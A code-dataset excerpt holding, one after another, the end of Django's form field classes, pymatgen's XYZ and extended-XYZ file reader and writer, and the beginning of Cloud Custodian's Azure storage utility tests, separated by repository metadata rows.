    """ChoiceField that accepts a list of selected values."""
    hidden_widget = MultipleHiddenInput
    widget = SelectMultiple
    default_error_messages = {
        'invalid_choice': _('Select a valid choice. %(value)s is not one of the available choices.'),
        'invalid_list': _('Enter a list of values.'),
    }

    def to_python(self, value):
        """Return the submitted values as a list of text strings."""
        if not value:
            return []
        if not isinstance(value, (list, tuple)):
            raise ValidationError(self.error_messages['invalid_list'], code='invalid_list')
        return [smart_text(item) for item in value]

    def validate(self, value):
        """Check that every submitted value is one of the declared choices."""
        if self.required and not value:
            raise ValidationError(self.error_messages['required'], code='required')
        for item in value:
            if not self.valid_value(item):
                raise ValidationError(
                    self.error_messages['invalid_choice'],
                    code='invalid_choice',
                    params={'value': item},
                )

    def _has_changed(self, initial, data):
        # Compare as sets of text; ordering is irrelevant for multi-selects.
        if initial is None:
            initial = []
        if data is None:
            data = []
        if len(initial) != len(data):
            return True
        initial_texts = set(force_text(v) for v in initial)
        data_texts = set(force_text(v) for v in data)
        return data_texts != initial_texts
class TypedMultipleChoiceField(MultipleChoiceField):
    """MultipleChoiceField whose clean() coerces each selected value."""

    def __init__(self, *args, **kwargs):
        # coerce defaults to identity; empty_value defaults to an empty list.
        self.coerce = kwargs.pop('coerce', lambda val: val)
        self.empty_value = kwargs.pop('empty_value', [])
        super(TypedMultipleChoiceField, self).__init__(*args, **kwargs)

    def _coerce(self, value):
        """
        Validates that the values are in self.choices and can be coerced to the
        right type.
        """
        if value == self.empty_value or value in self.empty_values:
            return self.empty_value
        coerced = []
        for choice in value:
            try:
                coerced.append(self.coerce(choice))
            except (ValueError, TypeError, ValidationError):
                raise ValidationError(
                    self.error_messages['invalid_choice'],
                    code='invalid_choice',
                    params={'value': choice},
                )
        return coerced

    def clean(self, value):
        return self._coerce(super(TypedMultipleChoiceField, self).clean(value))

    def validate(self, value):
        if value == self.empty_value:
            # An empty value is only acceptable when the field is optional.
            if self.required:
                raise ValidationError(self.error_messages['required'], code='required')
        else:
            super(TypedMultipleChoiceField, self).validate(value)
class ComboField(Field):
    """
    A Field whose clean() pipes the value through several sub-fields in turn.
    """

    def __init__(self, fields=(), *args, **kwargs):
        super(ComboField, self).__init__(*args, **kwargs)
        # ComboField enforces ``required`` itself; the sub-fields must not,
        # or an empty value would be rejected before reaching this field.
        for subfield in fields:
            subfield.required = False
        self.fields = fields

    def clean(self, value):
        """
        Validates the given value against all of self.fields, which is a
        list of Field instances.
        """
        value = super(ComboField, self).clean(value)
        for subfield in self.fields:
            value = subfield.clean(value)
        return value
class MultiValueField(Field):
    """
    A Field that aggregates the logic of multiple Fields.
    Its clean() method takes a "decompressed" list of values, which are then
    cleaned into a single value according to self.fields. Each value in
    this list is cleaned by the corresponding field -- the first value is
    cleaned by the first field, the second value is cleaned by the second
    field, etc. Once all fields are cleaned, the list of clean values is
    "compressed" into a single value.
    Subclasses should not have to implement clean(). Instead, they must
    implement compress(), which takes a list of valid values and returns a
    "compressed" version of those values -- a single value.
    You'll probably want to use this with MultiWidget.
    """
    default_error_messages = {
        'invalid': _('Enter a list of values.'),
        'incomplete': _('Enter a complete value.'),
    }

    def __init__(self, fields=(), *args, **kwargs):
        # When require_all_fields is True, this field's own 'required' check
        # covers all sub-fields; when False, each sub-field keeps its own
        # 'required' flag and reports 'incomplete' individually.
        self.require_all_fields = kwargs.pop('require_all_fields', True)
        super(MultiValueField, self).__init__(*args, **kwargs)
        for f in fields:
            # Give each sub-field an 'incomplete' message if it lacks one.
            f.error_messages.setdefault('incomplete',
                                        self.error_messages['incomplete'])
            if self.require_all_fields:
                # Set 'required' to False on the individual fields, because the
                # required validation will be handled by MultiValueField, not
                # by those individual fields.
                f.required = False
        self.fields = fields

    def __deepcopy__(self, memo):
        # Deep-copy the sub-fields too, so copies don't share mutable state.
        result = super(MultiValueField, self).__deepcopy__(memo)
        result.fields = tuple([x.__deepcopy__(memo) for x in self.fields])
        return result

    def validate(self, value):
        # Validation happens per sub-field inside clean(); nothing to do here.
        pass

    def clean(self, value):
        """
        Validates every value in the given list. A value is validated against
        the corresponding Field in self.fields.
        For example, if this MultiValueField was instantiated with
        fields=(DateField(), TimeField()), clean() would call
        DateField.clean(value[0]) and TimeField.clean(value[1]).
        """
        clean_data = []
        errors = []
        if not value or isinstance(value, (list, tuple)):
            # Entirely-empty input: enforce 'required' or compress to empty.
            if not value or not [v for v in value if v not in self.empty_values]:
                if self.required:
                    raise ValidationError(self.error_messages['required'], code='required')
                else:
                    return self.compress([])
        else:
            # Non-list input is malformed for a multi-value field.
            raise ValidationError(self.error_messages['invalid'], code='invalid')
        for i, field in enumerate(self.fields):
            try:
                field_value = value[i]
            except IndexError:
                # Missing trailing values are treated as empty.
                field_value = None
            if field_value in self.empty_values:
                if self.require_all_fields:
                    # Raise a 'required' error if the MultiValueField is
                    # required and any field is empty.
                    if self.required:
                        raise ValidationError(self.error_messages['required'], code='required')
                elif field.required:
                    # Otherwise, add an 'incomplete' error to the list of
                    # collected errors and skip field cleaning, if a required
                    # field is empty.
                    if field.error_messages['incomplete'] not in errors:
                        errors.append(field.error_messages['incomplete'])
                    continue
            try:
                clean_data.append(field.clean(field_value))
            except ValidationError as e:
                # Collect all validation errors in a single list, which we'll
                # raise at the end of clean(), rather than raising a single
                # exception for the first error we encounter. Skip duplicates.
                errors.extend(m for m in e.error_list if m not in errors)
        if errors:
            raise ValidationError(errors)
        # Compress the per-field values into one, then run field-level checks.
        out = self.compress(clean_data)
        self.validate(out)
        self.run_validators(out)
        return out

    def compress(self, data_list):
        """
        Returns a single value for the given list of values. The values can be
        assumed to be valid.
        For example, if this MultiValueField was instantiated with
        fields=(DateField(), TimeField()), this might return a datetime
        object created by combining the date and time in data_list.
        """
        raise NotImplementedError('Subclasses must implement this method.')

    def _has_changed(self, initial, data):
        # Compare per-sub-field; decompress a non-list initial value first.
        if initial is None:
            initial = ['' for x in range(0, len(data))]
        else:
            if not isinstance(initial, list):
                initial = self.widget.decompress(initial)
        for field, initial, data in zip(self.fields, initial, data):
            if field._has_changed(field.to_python(initial), data):
                return True
        return False
class FilePathField(ChoiceField):
    """A ChoiceField whose choices are files and/or folders found under ``path``."""

    def __init__(self, path, match=None, recursive=False, allow_files=True,
                 allow_folders=False, required=True, widget=None, label=None,
                 initial=None, help_text='', *args, **kwargs):
        self.path, self.match, self.recursive = path, match, recursive
        self.allow_files, self.allow_folders = allow_files, allow_folders
        super(FilePathField, self).__init__(choices=(), required=required,
            widget=widget, label=label, initial=initial, help_text=help_text,
            *args, **kwargs)

        # Optional fields get a blank "no selection" entry at the top.
        self.choices = [] if self.required else [("", "---------")]

        if self.match is not None:
            self.match_re = re.compile(self.match)

        def name_matches(name):
            # With no pattern configured, every name is accepted.
            return self.match is None or self.match_re.search(name)

        if recursive:
            for root, dirs, files in sorted(os.walk(self.path)):
                if self.allow_files:
                    for name in files:
                        if name_matches(name):
                            full = os.path.join(root, name)
                            self.choices.append((full, full.replace(path, "", 1)))
                if self.allow_folders:
                    for name in dirs:
                        if name == '__pycache__':
                            continue
                        if name_matches(name):
                            full = os.path.join(root, name)
                            self.choices.append((full, full.replace(path, "", 1)))
        else:
            try:
                for name in sorted(os.listdir(self.path)):
                    if name == '__pycache__':
                        continue
                    full = os.path.join(self.path, name)
                    wanted_kind = ((self.allow_files and os.path.isfile(full)) or
                                   (self.allow_folders and os.path.isdir(full)))
                    if wanted_kind and name_matches(name):
                        self.choices.append((full, name))
            except OSError:
                # An unreadable/absent directory simply yields no choices.
                pass

        self.widget.choices = self.choices
class SplitDateTimeField(MultiValueField):
    """MultiValueField combining a DateField and a TimeField into one datetime."""

    widget = SplitDateTimeWidget
    hidden_widget = SplitHiddenDateTimeWidget
    default_error_messages = {
        'invalid_date': _('Enter a valid date.'),
        'invalid_time': _('Enter a valid time.'),
    }

    def __init__(self, input_date_formats=None, input_time_formats=None, *args, **kwargs):
        # Layer caller-supplied messages over the defaults so the sub-fields
        # report this field's wording for a bad date or time.
        errors = dict(self.default_error_messages)
        if 'error_messages' in kwargs:
            errors.update(kwargs['error_messages'])
        localize = kwargs.get('localize', False)
        fields = (
            DateField(input_formats=input_date_formats,
                      error_messages={'invalid': errors['invalid_date']},
                      localize=localize),
            TimeField(input_formats=input_time_formats,
                      error_messages={'invalid': errors['invalid_time']},
                      localize=localize),
        )
        super(SplitDateTimeField, self).__init__(fields, *args, **kwargs)

    def compress(self, data_list):
        """Combine the cleaned [date, time] pair into one aware datetime (or None)."""
        if not data_list:
            return None
        # Either half may individually be empty when required=False.
        if data_list[0] in self.empty_values:
            raise ValidationError(self.error_messages['invalid_date'], code='invalid_date')
        if data_list[1] in self.empty_values:
            raise ValidationError(self.error_messages['invalid_time'], code='invalid_time')
        combined = datetime.datetime.combine(*data_list)
        return from_current_timezone(combined)
class IPAddressField(CharField):
    """Deprecated IPv4-only address field; use GenericIPAddressField instead."""

    default_validators = [validators.validate_ipv4_address]

    def __init__(self, *args, **kwargs):
        warnings.warn("IPAddressField has been deprecated. Use GenericIPAddressField instead.",
                      RemovedInDjango19Warning)
        super(IPAddressField, self).__init__(*args, **kwargs)

    def to_python(self, value):
        """Return the stripped text value, or '' for any empty value."""
        return '' if value in self.empty_values else value.strip()
class GenericIPAddressField(CharField):
    """CharField validating IPv4 and/or IPv6 addresses per ``protocol``."""

    def __init__(self, protocol='both', unpack_ipv4=False, *args, **kwargs):
        self.unpack_ipv4 = unpack_ipv4
        # Pick validators matching the allowed protocol(s).
        self.default_validators = validators.ip_address_validators(protocol, unpack_ipv4)[0]
        super(GenericIPAddressField, self).__init__(*args, **kwargs)

    def to_python(self, value):
        """Strip the value; normalize IPv6 literals (detected by a colon)."""
        if value in self.empty_values:
            return ''
        stripped = value.strip()
        if stripped and ':' in stripped:
            return clean_ipv6_address(stripped, self.unpack_ipv4)
        return stripped
class SlugField(CharField):
    """CharField restricted to slug characters (letters, digits, hyphens, underscores)."""

    default_validators = [validators.validate_slug]

    def clean(self, value):
        # Strip surrounding whitespace before the normal CharField cleaning.
        stripped = self.to_python(value).strip()
        return super(SlugField, self).clean(stripped)
| 38.916043
| 120
| 0.613359
|
acff7aae52865ebfdf28487a0998116b897dc77e
| 15,031
|
py
|
Python
|
pymatgen/io/xyz.py
|
stichri/pymatgen
|
b02a0099e3706b674a6729458e9101ee8ec78f44
|
[
"MIT"
] | null | null | null |
pymatgen/io/xyz.py
|
stichri/pymatgen
|
b02a0099e3706b674a6729458e9101ee8ec78f44
|
[
"MIT"
] | null | null | null |
pymatgen/io/xyz.py
|
stichri/pymatgen
|
b02a0099e3706b674a6729458e9101ee8ec78f44
|
[
"MIT"
] | null | null | null |
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Module implementing an (extended) XYZ file object class.
"""
import re
from io import StringIO
import pandas as pd
import numpy as np
from monty.io import zopen
from pymatgen.core import IMolecule, IStructure, Molecule, Lattice
from collections import OrderedDict, namedtuple
from operator import add
from typing import Dict, List, Tuple, Union, Any
class XYZ:
    """
    Basic class for importing and exporting Molecules or Structures in XYZ
    format.
    .. note::
        Exporting periodic structures in the XYZ format will lose information
        about the periodicity. Essentially, only Cartesian coordinates are
        written in this format and no information is retained about the
        lattice.
    """

    def __init__(self, mol: Molecule, coord_precision: int = 6):
        """
        Args:
            mol: Input molecule or list of molecules
            coord_precision: Precision to be used for coordinates.
        """
        # NOTE(review): any non-list input (including a tuple of molecules)
        # is wrapped as a single frame -- confirm tuples are not expected here.
        if isinstance(mol, Molecule) or not isinstance(mol, list):
            self._mols = [mol]
        else:
            self._mols = mol
        self.precision = coord_precision

    @property
    def molecule(self) -> Molecule:
        """
        Returns molecule associated with this XYZ. In case multiple frame
        XYZ, returns the last frame.
        """
        return self._mols[-1]

    @property
    def all_molecules(self):
        """
        Returns all the frames of molecule associated with this XYZ.
        """
        return self._mols

    @staticmethod
    def _from_frame_string(contents):
        """
        Convert a single frame XYZ string to a molecule
        """
        lines = contents.split("\n")
        # Line 0 holds the site count; line 1 is the (ignored) comment line.
        num_sites = int(lines[0])
        coords = []
        sp = []
        # Accepts Fortran-style exponents (d/D) and the "*^" exponent form.
        coord_patt = re.compile(r"(\w+)\s+([0-9\-\+\.*^eEdD]+)\s+([0-9\-\+\.*^eEdD]+)\s+" r"([0-9\-\+\.*^eEdD]+)")
        for i in range(2, 2 + num_sites):
            m = coord_patt.search(lines[i])
            if m:
                sp.append(m.group(1))  # this is 1-indexed
                # this is 0-indexed
                # in case of 0.0D+00 or 0.00d+01 old double precision writing
                # replace d or D by e for ten power exponent,
                # and some files use *^ convention in place of e
                xyz = [val.lower().replace("d", "e").replace("*^", "e") for val in m.groups()[1:4]]
                coords.append([float(val) for val in xyz])
        return Molecule(sp, coords)

    @staticmethod
    def from_string(contents):
        """
        Creates XYZ object from a string.
        Args:
            contents: String representing an XYZ file.
        Returns:
            XYZ object
        """
        # Guarantee a trailing newline so the frame regex matches the last frame.
        if contents[-1] != "\n":
            contents += "\n"
        white_space = r"[ \t\r\f\v]"
        natoms_line = white_space + r"*\d+" + white_space + r"*\n"
        comment_line = r"[^\n]*\n"
        coord_lines = r"(\s*\w+\s+[0-9\-\+\.*^eEdD]+\s+[0-9\-\+\.*^eEdD]+" r"\s+[0-9\-\+\.*^eEdD]+.*\n)+"
        # A frame is: atom-count line, comment line, then one coord line per atom.
        frame_pattern_text = natoms_line + comment_line + coord_lines
        pat = re.compile(frame_pattern_text, re.MULTILINE)
        mols = []
        for xyz_match in pat.finditer(contents):
            xyz_text = xyz_match.group(0)
            mols.append(XYZ._from_frame_string(xyz_text))
        return XYZ(mols)

    @staticmethod
    def from_file(filename):
        """
        Creates XYZ object from a file.
        Args:
            filename: XYZ filename
        Returns:
            XYZ object
        """
        # zopen transparently handles gzipped/compressed files.
        with zopen(filename, "rt") as f:
            return XYZ.from_string(f.read())

    def as_dataframe(self):
        """
        Generates a coordinates data frame with columns: atom, x, y, and z
        In case of multiple frame XYZ, returns the last frame.
        Returns:
            pandas.DataFrame
        """
        # Round-trip through the string form and parse it back with pandas.
        lines = str(self)
        sio = StringIO(lines)
        df = pd.read_csv(
            sio,
            header=None,
            skiprows=[0, 1],
            comment="#",
            delim_whitespace=True,
            names=["atom", "x", "y", "z"],
        )
        # Sites are conventionally numbered from 1.
        df.index += 1
        return df

    def _frame_str(self, frame_mol):
        # One frame: site count, formula as the comment line, then coordinates
        # formatted to self.precision decimal places.
        output = [str(len(frame_mol)), frame_mol.composition.formula]
        fmtstr = f"{{}} {{:.{self.precision}f}} {{:.{self.precision}f}} {{:.{self.precision}f}}"
        for site in frame_mol:
            output.append(fmtstr.format(site.specie, site.x, site.y, site.z))
        return "\n".join(output)

    def __str__(self):
        # Frames are concatenated back to back, one per molecule.
        return "\n".join([self._frame_str(mol) for mol in self._mols])

    def write_file(self, filename):
        """
        Writes XYZ to file.
        Args:
            filename: File name of output file.
        """
        with zopen(filename, "wt") as f:
            f.write(self.__str__())
class EXYZ(XYZ):
    """
    Basic class for importing and exporting structure or molecules in the extended XYZ
    format as described at https://libatoms.github.io/QUIP/io.html#extendedxyz.
    Args:
        structure: Input (list of) structure(s) or molecule(s)
    .. note::
        While exporting periodic structures in the XYZ format will lose information
        about periodicity, the extended XYZ format does retain such information.
        Moreover, arbitrary metadata is retained and encoded in terms of bools
        (T or F), integer numbers, floats or strings (delimited by quotation marks
        when including whitespaces) on a per-site and per-structure/molecule basis.
    """

    # Extended-XYZ type code -> Python type (both letter cases accepted).
    _code2type = {
        "L" : bool, "l" : bool,
        "I" : int, "i" : int,
        "R" : float, "r" : float,
        "S" : str, "s" : str
    }
    # Python/NumPy type -> extended-XYZ type code.
    # BUGFIX: the deprecated aliases np.int / np.float (removed in NumPy 1.24)
    # were dropped -- they were identical to the builtin int / float keys --
    # and the platform-dependent np.float128 (absent on Windows) was replaced
    # by the portable np.longdouble alias. np.bool_ and np.float32 were added.
    _type2code = {
        bool : "L", np.bool_ : "L",
        int : "I", np.int64 : "I", np.int32 : "I", np.int16 : "I", np.int8 : "I",
        float : "R", np.longdouble : "R", np.float64 : "R", np.float32 : "R", np.float16 : "R",
        str : "S", list : "S", tuple : "S", np.ndarray : "S"
    }
    _quotes = r"\"'`´"
    _whites_etc = r"\t\n\r\f\v"
    # Character classes stripped from keys/values before writing.
    _site_prop_key_sanitize_match = "[" + _whites_etc + _quotes + ":" + "]+"
    _site_prop_val_sanitize_match = "[" + _whites_etc + _quotes + "]+"
    _frame_prop_key_sanitize_match = "[" + " " + _whites_etc + _quotes + "=" + "]+"
    _frame_prop_val_sanitize_match = "[" + _whites_etc + _quotes + "=" + "]+"
    # One per-site data column: its type code, rows of strings, column width(s).
    EXYZData = namedtuple("EXYZData", ["code", "data", "width"])

    def __init__(
            self,
            mol: Union[IStructure, List[IStructure], IMolecule, List[IMolecule]],
            mol_props: Union[Dict, List[Dict], Tuple[Dict]] = None,
            float_precision : int = 6
    ) -> None:
        """
        Args:
            mol: Input structure/molecule or list thereof.
            mol_props: Per-frame property dict(s); one per structure/molecule.
            float_precision: Decimal places used when formatting floats.
        Raises:
            ValueError: if the number of property sets differs from the
                number of molecules.
        """
        super().__init__(
            mol,
            coord_precision=float_precision
        )
        self._fmt_float = "{{:.{}f}}".format(self.precision)
        # Use concrete classes for the runtime check (isinstance against
        # typing.List/typing.Tuple is deprecated and behaves identically).
        if isinstance(mol_props, (list, tuple)):
            self._mols_props = mol_props
        elif mol_props is not None:
            self._mols_props = [mol_props]
        else:
            self._mols_props = [None for m in self._mols]
        if not len(self._mols_props) == len(self._mols):
            raise ValueError(
                "not as many molecule property sets ({}) as molecules ({})".format(
                    len(self._mols_props),
                    len(self._mols)
                )
            )

    @staticmethod
    def _mol_and_props_from_lines(
            line_comment: str,
            lines_sites: List[str]
    ) -> Tuple[IStructure, Dict]:
        # TODO: single-frame parsing is not implemented yet; returns a
        # (structure, properties) placeholder.
        return None, None

    @staticmethod
    def from_string(
            string: str
    ) -> "EXYZ":  # python <=3.7 can't annotate types not defined before, python >=4.0 will ...
        """Parse zero or more extended-XYZ frames from ``string``."""
        # BUGFIX: the condition was inverted -- the trailing newline must be
        # appended when it is *missing*, not when it is already present.
        string = string if string.endswith("\n") else string + "\n"
        mols = []
        mols_props = []
        lines = iter(string.split("\n"))
        for line in lines:
            # Skip blank lines (including the empty tail produced by splitting
            # on the final newline), which previously triggered an uncaught
            # IndexError in ``line.split()[0]``.
            if not line.strip():
                continue
            try:
                num_sites = int(line.split()[0])
            except ValueError as ve:
                raise Exception(str(ve) + " for frame {}".format(len(mols)+1)) from ve
            try:
                mol, props = EXYZ._mol_and_props_from_lines(
                    line_comment=next(lines),
                    lines_sites=[next(lines) for n in range(num_sites)]
                )
                mols.append(mol)
                mols_props.append(props)
            except StopIteration:
                raise RuntimeError("lines unexpectedly exhausted while parsing exyz-file")
        # BUGFIX: previously returned ``EXYZ(mols, props)`` -- i.e. only the
        # last frame's properties (or a NameError for empty input) -- instead
        # of the accumulated per-frame list.
        return EXYZ(mols, mols_props)

    def _site_prop_key(
            self,
            k: str
    ) -> str:
        """Strip characters that would break the per-site Properties spec."""
        key = re.sub(self._site_prop_key_sanitize_match, "", str(k))
        return key

    def _site_prop_val(
            self,
            v: str
    ) -> str:
        """Sanitize a per-site value; quote it when it contains spaces."""
        val = re.sub(self._site_prop_val_sanitize_match, "", str(v))
        if re.search("[ ]+", val):
            val = '"' + val + '"'
        return val

    def _code(
            self,
            val: Any
    ) -> str:
        """Return the extended-XYZ type code for ``val``'s concrete type."""
        try:
            code = self._type2code[type(val)]
        except KeyError:
            raise ValueError(
                "Unable to map {} ({}), use appropriate string representation".format(type(val), val)
            )
        return code

    def _val2coldata(
            self,
            val: Union[List, Tuple, np.ndarray, Any],
            probe_seq=True
    ) -> Tuple[str, List[str], List[int]]:
        """Format one per-site value (scalar or sequence) into column strings.

        Returns:
            (type code, list of formatted fields, list of field widths)
        """
        if probe_seq and isinstance(val, (list, tuple, np.ndarray)):
            # A sequence value becomes several sub-columns of a single type.
            codes = [self._code(v) for v in val]
            if not len(set(codes)) == 1:
                raise TypeError("Inconcistent types in data field")
            code = codes[0]
            data_str = [self._site_prop_val(*self._val2coldata(v, probe_seq=False)[1]) for v in val]
            width = [len(d) for d in data_str]
        else:
            code = self._code(val)
            if code == "R":
                data_str = self._fmt_float.format(val)
            elif code == "L":
                # Extended XYZ encodes booleans as T / F.
                data_str = "T" if val else "F"
            else:
                data_str = str(val)
            data_str = [self._site_prop_val(data_str)]
            width = [len(data_str[0])]
        return code, data_str, width

    def _site_data_columns(
            self,
            data_col: List
    ) -> EXYZData:
        """Format one property across all sites, tracking maximal field widths."""
        code0 = None
        data_str0 = []
        width0 = None
        for d in data_col:
            code, data_str, width = self._val2coldata(d)
            if not code0:
                code0 = code
            if not width0:
                width0 = width
            if not code0 == code:
                raise TypeError("Inconsistent types in data column")
            if not len(width0) == len(width):
                raise ValueError("Inconsistent lengths in data column")
            data_str0.append(data_str)
            # Keep the running per-sub-column maximum width for alignment.
            width = tuple(max(w, w0) for w, w0 in zip(width, width0))
            width0 = width
        return EXYZ.EXYZData(code=code, data=data_str0, width=width)

    def _site_prop_keys_and_data(
            self,
            mol: IStructure,
            data: OrderedDict
    ) -> str:
        """Build the Properties=... descriptor and fill ``data`` with columns."""
        props_str = "species"
        data["species"] = self._site_data_columns([str(site.specie) for site in mol])
        props_str += ":" + data["species"].code + ":" + str(len(data["species"].width))
        props_str += ":" + "pos"
        data["pos"] = self._site_data_columns([site.coords for site in mol])
        props_str += ":" + data["pos"].code + ":" + str(len(data["pos"].width))
        for (key, val) in mol.site_properties.items():
            key = self._site_prop_key(str(key))
            props_str += ":" + key
            data[key] = self._site_data_columns(val)
            props_str += ":" + data[key].code + ":" + str(len(data[key].width))
        # delimit properties value with quotes in case property keys include space(s):
        # BUGFIX: re.match only inspects the start of the string (which always
        # begins with "species"), so the quoting never fired; re.search finds a
        # space anywhere in the descriptor, matching the stated intent.
        if re.search("[ ]+", props_str):
            props_str = '"' + props_str + '"'
        return "Properties=" + props_str

    def _frame_prop_key(
            self,
            key: str
    ) -> str:
        """Strip characters that would break a key=value frame property."""
        key = re.sub(self._frame_prop_key_sanitize_match, "", str(key))
        return key

    def _frame_prop_val(
            self,
            val: str
    ) -> str:
        """Sanitize a frame property value; quote it when it contains spaces."""
        val = re.sub(self._frame_prop_val_sanitize_match, "", str(val))
        if re.search("[ ]+", val):
            val = '"' + val + '"'
        return val

    def _val2propval(
            self,
            val: Any
    ) -> str:
        """Encode one frame property value per its extended-XYZ type code."""
        code = self._code(val)
        if code == "R":
            val = self._fmt_float.format(val)
        elif code == "L":
            val = "T" if val else "F"
        else:
            val = self._frame_prop_val(str(val))
        return val

    def _get_commentline_and_data(
            self,
            mol: IStructure,
            data: OrderedDict,
            props: Dict
    ) -> str:
        """Build the frame comment line: Lattice, Properties and frame props."""
        com_str = 'Lattice="' + " ".join(
            self._fmt_float.format(x) for x in mol.lattice.matrix.flat
        ) + '"'
        com_str += " " + self._site_prop_keys_and_data(mol, data)
        if props:
            for (key, val) in props.items():
                if not isinstance(key, str):
                    raise TypeError("non-string frame property key")
                key = self._frame_prop_key(key)
                com_str += " " + key
                com_str += "=" + self._val2propval(val)
        return com_str

    def _compile_data_lines(
            self,
            data: OrderedDict
    ) -> List[str]:
        """Join the per-property columns into right-aligned per-site lines."""
        if not len(set(len(col.data) for col in data.values())) == 1:
            raise ValueError("inconsistent amount of properties given.")
        # Consume the first column (NB: mutates ``data``), then append the rest.
        prop, col = data.popitem(last=False)
        lines = [" ".join(f.rjust(w) for (f, w) in zip(fields, col.width)) for fields in col.data]
        for col in data.values():
            lines = map(
                add,
                lines,
                [" " + " ".join(f.rjust(w) for (f, w) in zip(fields, col.width)) for fields in col.data]
            )
        return lines

    def _frame_str(
            self,
            mol: Union[IMolecule, IStructure],
            props: Dict = None
    ) -> str:
        """Serialize one frame; molecules get boxed in a padded cubic lattice."""
        # NOTE(review): IMolecule exposes no ``lattice`` attribute, so this
        # test presumably expects a Structure-like object (or a falsy
        # lattice) -- confirm against callers.
        if not mol.lattice:
            lat = Lattice.cubic(2.*mol.distance_matrix.max())
            center = lat.get_cartesian_coords([.5, .5, .5])
            mol = IStructure(
                lat,
                [s.specie for s in mol],
                [s.coords - mol.center_of_mass + center for s in mol],
                coords_are_cartesian=True,
                site_properties=mol.site_properties
            )
        output = [str(mol.num_sites)]
        data = OrderedDict()
        output.append(self._get_commentline_and_data(mol, data, props))
        output.extend(self._compile_data_lines(data))
        return "\n".join(output)

    def __str__(self) -> str:
        return "\n".join(self._frame_str(m, p) for m, p in zip(self._mols, self._mols_props))
| 32.534632
| 114
| 0.534296
|
acff7adc4d0ae4b4281f9f2211f3a987d20bbc2e
| 8,246
|
py
|
Python
|
tools/c7n_azure/tests_azure/test_storageutils.py
|
blade2005/cloud-custodian
|
21ecdd60ae8a78887cf9d135367b283ce88b0fd9
|
[
"Apache-2.0"
] | null | null | null |
tools/c7n_azure/tests_azure/test_storageutils.py
|
blade2005/cloud-custodian
|
21ecdd60ae8a78887cf9d135367b283ce88b0fd9
|
[
"Apache-2.0"
] | null | null | null |
tools/c7n_azure/tests_azure/test_storageutils.py
|
blade2005/cloud-custodian
|
21ecdd60ae8a78887cf9d135367b283ce88b0fd9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015-2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
from azure.common import AzureHttpError
from azure.mgmt.storage.models import StorageAccountListKeysResult, StorageAccountKey
from azure.storage.common import TokenCredential
from .azure_common import BaseTest, arm_template, requires_arm_polling
from c7n_azure.session import Session
from c7n_azure.storage_utils import StorageUtilities
from c7n_azure.utils import ResourceIdParser
from mock import patch
from c7n.utils import local_session
@requires_arm_polling
class StorageUtilsTest(BaseTest):
    """Integration tests for c7n_azure StorageUtilities against ARM-deployed storage."""

    def setUp(self):
        super(StorageUtilsTest, self).setUp()
        self.session = Session()
        # The URI->storage helper is memoized; clear it so tests stay isolated.
        StorageUtilities.get_storage_from_uri.cache_clear()

    @arm_template('storage.json')
    def test_get_storage_client_by_uri(self):
        """A blob URI splits into a service client, container name and key prefix."""
        account = self.setup_account()
        url = "https://" + account.name + ".blob.core.windows.net/testcontainer/extrafolder"
        blob_service, container_name, key_prefix = \
            StorageUtilities.get_blob_client_by_uri(url, self.session)
        self.assertIsNotNone(blob_service)
        self.assertEqual(container_name, "testcontainer")
        self.assertEqual(key_prefix, "extrafolder")

    @arm_template('storage.json')
    def test_get_storage_client_by_uri_extra_directories(self):
        """Nested path segments after the container become one key prefix."""
        account = self.setup_account()
        url = "https://" + account.name + \
              ".blob.core.windows.net/testcontainer/extrafolder/foo/bar"
        blob_service, container_name, key_prefix = \
            StorageUtilities.get_blob_client_by_uri(url, self.session)
        self.assertIsNotNone(blob_service)
        self.assertEqual(container_name, "testcontainer")
        self.assertEqual(key_prefix, "extrafolder/foo/bar")

    @arm_template('storage.json')
    def test_get_queue_client_by_uri(self):
        """A queue URI resolves to a queue service client and the queue name."""
        account = self.setup_account()
        url = "https://" + account.name + ".queue.core.windows.net/testcc"
        queue_service, queue_name = StorageUtilities.get_queue_client_by_uri(url, self.session)
        self.assertIsNotNone(queue_service)
        self.assertEqual(queue_name, "testcc")

    def test_get_queue_client_expired_token(self):
        """
        Exception handler should deal with a bad token by clearing
        cache and retrying. So if we provide a bad token followed
        by a real one in our mock, we expect it to end up getting
        the real token.
        """
        real_token = StorageUtilities.get_storage_token(self.session)
        with patch('c7n_azure.storage_utils.QueueService.create_queue') as create_mock:
            with patch('c7n_azure.storage_utils.StorageUtilities.get_storage_token') as token_mock:
                error = AzureHttpError('', 403)
                error.error_code = 'AuthenticationFailed'
                # Two side effects: one with a bad token and an error,
                # and one with a good token and no error
                create_mock.side_effect = [error, None]
                token_mock.side_effect = [TokenCredential('fake'), real_token]
                url = "https://fake.queue.core.windows.net/testcc"
                queue_service, queue_name = \
                    StorageUtilities.get_queue_client_by_uri(url, self.session)
                # We end up with the real token (after a retry)
                self.assertEqual(real_token, queue_service.authentication)

    @arm_template('storage.json')
    def test_create_delete_queue_from_storage_account(self):
        """A queue can be created on, then deleted from, a storage account."""
        account = self.setup_account()
        queue_name = 'testqueuecc'
        queue = \
            StorageUtilities.create_queue_from_storage_account(account, queue_name, self.session)
        self.assertTrue(queue)
        result = \
            StorageUtilities.delete_queue_from_storage_account(account, queue_name, self.session)
        self.assertTrue(result)

    @arm_template('storage.json')
    def test_cycle_queue_message_by_uri(self):
        """A message can be put, read and deleted via the queue client helpers."""
        account = self.setup_account()
        url = "https://" + account.name + ".queue.core.windows.net/testcyclemessage"
        queue_settings = StorageUtilities.get_queue_client_by_uri(url, self.session)
        StorageUtilities.put_queue_message(*queue_settings, content=u"hello queue")
        # Pull messages, should be 1
        messages = StorageUtilities.get_queue_messages(*queue_settings)
        self.assertEqual(len(messages), 1)
        # Read message and delete it from queue
        for message in messages:
            self.assertEqual(message.content, u"hello queue")
            StorageUtilities.delete_queue_message(*queue_settings, message=message)
        # Pull messages again, should be empty
        messages = StorageUtilities.get_queue_messages(*queue_settings)
        self.assertEqual(len(messages), 0)

    @arm_template('storage.json')
    def test_get_storage_token(self):
        """A storage-scoped AAD token can be acquired from the session."""
